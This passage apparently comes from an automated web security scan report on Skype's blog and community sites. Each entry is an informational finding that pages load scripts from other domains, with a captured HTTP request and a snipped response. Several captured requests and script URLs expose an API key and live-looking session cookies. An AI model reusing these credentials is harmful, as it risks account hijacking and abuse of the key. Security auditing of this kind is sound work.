<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.133. http://blogs.skype.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /security/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /security/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 52462
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.134. http://blogs.skype.com/zh-Hans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /zh-Hans/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /zh-Hans/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 50254
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hans" lang="zh-Hans">
<head>
<titl
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.135. http://blogs.skype.com/zh-Hant/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /zh-Hant/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /zh-Hant/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60218
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hant" lang="zh-Hant">

<head>
<tit
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.136. http://community.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/2EA4AD2822E7F82D3373A89F553F05E7/lia-scripts-body-min.js"></script>
...[SNIP]...

18.137. http://community.skype.com/lithium/forum/images/divider-gray-300.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /lithium/forum/images/divider-gray-300.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lithium/forum/images/divider-gray-300.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:09:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 36435
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.138. http://community.skype.com/t5/Accesorios-y-hardware/bd-p/es_hardware  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Accesorios-y-hardware/bd-p/es_hardware

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Accesorios-y-hardware/bd-p/es_hardware HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 82227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.139. http://community.skype.com/t5/Allgemeine-Diskussion/bd-p/de_general  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Allgemeine-Diskussion/bd-p/de_general

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Allgemeine-Diskussion/bd-p/de_general HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:58 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 125717

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.2//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile12.dtd"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
   
   
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/51263837D0CB4747985804ECA0249312/lia-scripts-body-min.js"></script>
...[SNIP]...

18.140. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cookie: mbox=session#1314116641836-449310#1314120755|PC#1314116641836-449310.19#1316710895|check#true#1314118955; s_nr=1314120062684-New; __utma=242698589.1857710967.1314116648.1314116648.1314116648.1; __utmz=242698589.1314116648.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2729EA07851D0931-6000010C20019DC8[CE]; SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; LiSESSIONID=1F5F55A104B15E98305CB8453A5AA234; VISITORID=76516592

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:42:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 244240
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.141. http://community.skype.com/t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:20 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.142. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.143. http://community.skype.com/t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 208073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.144. http://community.skype.com/t5/Coffee-Corner/ADD-ME/m-p/134208  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Coffee-Corner/ADD-ME/m-p/134208

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Coffee-Corner/ADD-ME/m-p/134208 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.145. http://community.skype.com/t5/Coffee-Corner/Add-me/m-p/134218  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Coffee-Corner/Add-me/m-p/134218

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Coffee-Corner/Add-me/m-p/134218 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.146. http://community.skype.com/t5/Coffee-Corner/bd-p/Coffee_corner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Coffee-Corner/bd-p/Coffee_corner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Coffee-Corner/bd-p/Coffee_corner HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 188087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.147. http://community.skype.com/t5/Computer/ct-p/Computer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Computer/ct-p/Computer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Computer/ct-p/Computer HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 126981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.148. http://community.skype.com/t5/Deutsch/ct-p/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Deutsch/ct-p/de

Issue detail

The response dynamically includes the following scripts from other domains:

Request

